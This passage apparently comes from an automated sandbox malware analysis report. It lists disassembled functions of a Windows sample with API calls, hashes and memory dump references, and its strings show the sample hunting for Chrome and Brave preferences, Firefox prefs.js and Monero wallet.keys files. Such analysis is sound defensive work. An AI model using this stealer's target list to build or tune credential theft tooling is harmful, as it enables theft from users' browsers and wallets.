                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                          • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                          • API String ID: 1125553467-2524465048
                          • Opcode ID: bcee5ee08eb46fe4fe0d1bd75c2532b73366d51e7375ffc27d1ef7851c0e0694
                          • Instruction ID: 4f18ca1a7aca1c68bda9b67120c7d61bc31fe807e214197f7a5f9edd44aca231
                          • Opcode Fuzzy Hash: bcee5ee08eb46fe4fe0d1bd75c2532b73366d51e7375ffc27d1ef7851c0e0694
                          • Instruction Fuzzy Hash: 57A122B19002489FDB24DBA5DC85FFE7378BB88300F48459DE51DA6141EB759B88CF62
                          Function 00CBBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CCA920: lstrcpy.KERNEL32(00000000,?), ref: 00CCA972
                            • Part of subcall function 00CCA920: lstrcat.KERNEL32(00000000), ref: 00CCA982
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                          • FindFirstFileA.KERNEL32(00000000,?,00CD0B32,00CD0B2B,00000000,?,?,?,00CD13F4,00CD0B2A), ref: 00CBBEF5
                          • StrCmpCA.SHLWAPI(?,00CD13F8), ref: 00CBBF4D
                          • StrCmpCA.SHLWAPI(?,00CD13FC), ref: 00CBBF63
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00CBC7BF
                          • FindClose.KERNEL32(000000FF), ref: 00CBC7D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                          • API String ID: 3334442632-726946144
                          • Opcode ID: 58a3ec1b32ecd9ba3281db9c8aebbb42c9911cd037faf8f0530dee2bdb169b73
                          • Instruction ID: 775729cbae796f5796463354bf12679279b30995b10443d6527900a61f1ae57b
                          • Opcode Fuzzy Hash: 58a3ec1b32ecd9ba3281db9c8aebbb42c9911cd037faf8f0530dee2bdb169b73
                          • Instruction Fuzzy Hash: EE424572910108ABCB14FB70DD9AFED737DAB94304F40456CF90AA6191EE349F49DBA2
                          Function 00CC4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 00CC492C
                          • FindFirstFileA.KERNEL32(?,?), ref: 00CC4943
                          • StrCmpCA.SHLWAPI(?,00CD0FDC), ref: 00CC4971
                          • StrCmpCA.SHLWAPI(?,00CD0FE0), ref: 00CC4987
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00CC4B7D
                          • FindClose.KERNEL32(000000FF), ref: 00CC4B92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s$%s\%s$%s\*
                          • API String ID: 180737720-445461498
                          • Opcode ID: 5601b76836e94edabc34c683c8118095f1309852b2ff75da1f951079471dd2f0
                          • Instruction ID: cc38ef81f7e3937e4c0e764fe47e008efaeecbef77b0dc42eff74d6cf28f9f86
                          • Opcode Fuzzy Hash: 5601b76836e94edabc34c683c8118095f1309852b2ff75da1f951079471dd2f0
                          • Instruction Fuzzy Hash: FF6134B1500218AFCB24EBA5DC59FFA737CBB88700F44859DE60DA6141EA71DB49CF91
                          Function 00CC4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00CC4580
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CC4587
                          • wsprintfA.USER32 ref: 00CC45A6
                          • FindFirstFileA.KERNEL32(?,?), ref: 00CC45BD
                          • StrCmpCA.SHLWAPI(?,00CD0FC4), ref: 00CC45EB
                          • StrCmpCA.SHLWAPI(?,00CD0FC8), ref: 00CC4601
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00CC468B
                          • FindClose.KERNEL32(000000FF), ref: 00CC46A0
                          • lstrcat.KERNEL32(?,0189E5E8), ref: 00CC46C5
                          • lstrcat.KERNEL32(?,0189D848), ref: 00CC46D8
                          • lstrlen.KERNEL32(?), ref: 00CC46E5
                          • lstrlen.KERNEL32(?), ref: 00CC46F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                          • String ID: %s\%s$%s\*
                          • API String ID: 671575355-2848263008
                          • Opcode ID: dff8d1bcc88f6fe7d20e3a3e6de1eb567b7fb2692903b83e12d7ef7622f4c56d
                          • Instruction ID: b2020cf2e5b57efb12a2aa315b4f4f00b8a3c36af7decf181ea95c12c47e6341
                          • Opcode Fuzzy Hash: dff8d1bcc88f6fe7d20e3a3e6de1eb567b7fb2692903b83e12d7ef7622f4c56d
                          • Instruction Fuzzy Hash: 205154B15002189FC724EBB1DC99FF9737CAB98700F444599F60DA6190EB759B88CFA1
                          Function 00CC3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 00CC3EC3
                          • FindFirstFileA.KERNEL32(?,?), ref: 00CC3EDA
                          • StrCmpCA.SHLWAPI(?,00CD0FAC), ref: 00CC3F08
                          • StrCmpCA.SHLWAPI(?,00CD0FB0), ref: 00CC3F1E
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00CC406C
                          • FindClose.KERNEL32(000000FF), ref: 00CC4081
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s
                          • API String ID: 180737720-4073750446
                          • Opcode ID: c4b43df57311723bc054fa7c614ae39ebeffa185f5a3f0af37b45fb6c485f693
                          • Instruction ID: d77dba6dc1755d5fb2eb2d8b258d72cda84eef78c89de13b3bab4ae97253eec9
                          • Opcode Fuzzy Hash: c4b43df57311723bc054fa7c614ae39ebeffa185f5a3f0af37b45fb6c485f693
                          • Instruction Fuzzy Hash: BD5133B1900218ABCB24EBA5DC89FFA737CBB88300F44859DF65D96040EB759B89CF51
                          Function 00CBED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 00CBED3E
                          • FindFirstFileA.KERNEL32(?,?), ref: 00CBED55
                          • StrCmpCA.SHLWAPI(?,00CD1538), ref: 00CBEDAB
                          • StrCmpCA.SHLWAPI(?,00CD153C), ref: 00CBEDC1
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00CBF2AE
                          • FindClose.KERNEL32(000000FF), ref: 00CBF2C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\*.*
                          • API String ID: 180737720-1013718255
                          • Opcode ID: efac081a6202558add822162bc03d334c02e4bea27c8c2f29795a048073ee47e
                          • Instruction ID: 678a8e2aa9b3c248a103613b84381edff782245b055953703a6ad4a405dda7c4
                          • Opcode Fuzzy Hash: efac081a6202558add822162bc03d334c02e4bea27c8c2f29795a048073ee47e
                          • Instruction Fuzzy Hash: 52E1BC7191111C9BEB54EB61DC5AFEE7338AF54304F4041ADF50A66092EE306F8ADF52
                          Function 00CBF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CCA920: lstrcpy.KERNEL32(00000000,?), ref: 00CCA972
                            • Part of subcall function 00CCA920: lstrcat.KERNEL32(00000000), ref: 00CCA982
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00CD15B8,00CD0D96), ref: 00CBF71E
                          • StrCmpCA.SHLWAPI(?,00CD15BC), ref: 00CBF76F
                          • StrCmpCA.SHLWAPI(?,00CD15C0), ref: 00CBF785
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00CBFAB1
                          • FindClose.KERNEL32(000000FF), ref: 00CBFAC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: prefs.js
                          • API String ID: 3334442632-3783873740
                          • Opcode ID: cdbe6710fa6f40249e012f4412cb7479780ddaed7be568926cfa3803eacb9220
                          • Instruction ID: f499e57e02872aeb6d4c862aa9025413c974bb933197faa5c4914e0216c0c1d9
                          • Opcode Fuzzy Hash: cdbe6710fa6f40249e012f4412cb7479780ddaed7be568926cfa3803eacb9220
                          • Instruction Fuzzy Hash: 52B144719001089BDB24FF61DC9AFEE7379AF94304F4085ADE50A96191EF306B4ADF92
                          Function 0106F8F3 Relevance: 15.4, Strings: 11, Instructions: 1646COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: }`)$2,G^$;b{v$TR[$Z_=$_jn]$_q{i$`+$a>E_$a>E_$sk%
                          • API String ID: 0-3676237254
                          • Opcode ID: 9a4965d07a5722c634027f9e072a4f143e87464747ae211ddbc063d3cd2ac14d
                          • Instruction ID: 54068a1a9c7be7a506df9c3b528aaa7e4ae99eb6f6d16897c91aad19eaa66337
                          • Opcode Fuzzy Hash: 9a4965d07a5722c634027f9e072a4f143e87464747ae211ddbc063d3cd2ac14d
                          • Instruction Fuzzy Hash: 8FB21AF3A08200AFE704AE2DEC8567AFBE6EFD4720F1A853DE6C4C7744E57558058692
                          Function 00CB16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00CD510C,?,?,?,00CD51B4,?,?,00000000,?,00000000), ref: 00CB1923
                          • StrCmpCA.SHLWAPI(?,00CD525C), ref: 00CB1973
                          • StrCmpCA.SHLWAPI(?,00CD5304), ref: 00CB1989
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00CB1D40
                          • DeleteFileA.KERNEL32(00000000), ref: 00CB1DCA
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00CB1E20
                          • FindClose.KERNEL32(000000FF), ref: 00CB1E32
                            • Part of subcall function 00CCA920: lstrcpy.KERNEL32(00000000,?), ref: 00CCA972
                            • Part of subcall function 00CCA920: lstrcat.KERNEL32(00000000), ref: 00CCA982
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 1415058207-1173974218
                          • Opcode ID: 77129aba93ea0e98bb1da584bd4c89b5a1c7629319cfc070f5820f1d37e6d927
                          • Instruction ID: 301189e1d3a2b8a38d3f662230419e20f09130b3ae6e0739a3590b92cc3e3835
                          • Opcode Fuzzy Hash: 77129aba93ea0e98bb1da584bd4c89b5a1c7629319cfc070f5820f1d37e6d927
                          • Instruction Fuzzy Hash: F312EB7191011C9BDB29EB61DC9AFEE7378AF54304F4041ADE50A66091EF306F8ADFA1
                          Function 00CBDE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00CD0C2E), ref: 00CBDE5E
                          • StrCmpCA.SHLWAPI(?,00CD14C8), ref: 00CBDEAE
                          • StrCmpCA.SHLWAPI(?,00CD14CC), ref: 00CBDEC4
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00CBE3E0
                          • FindClose.KERNEL32(000000FF), ref: 00CBE3F2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
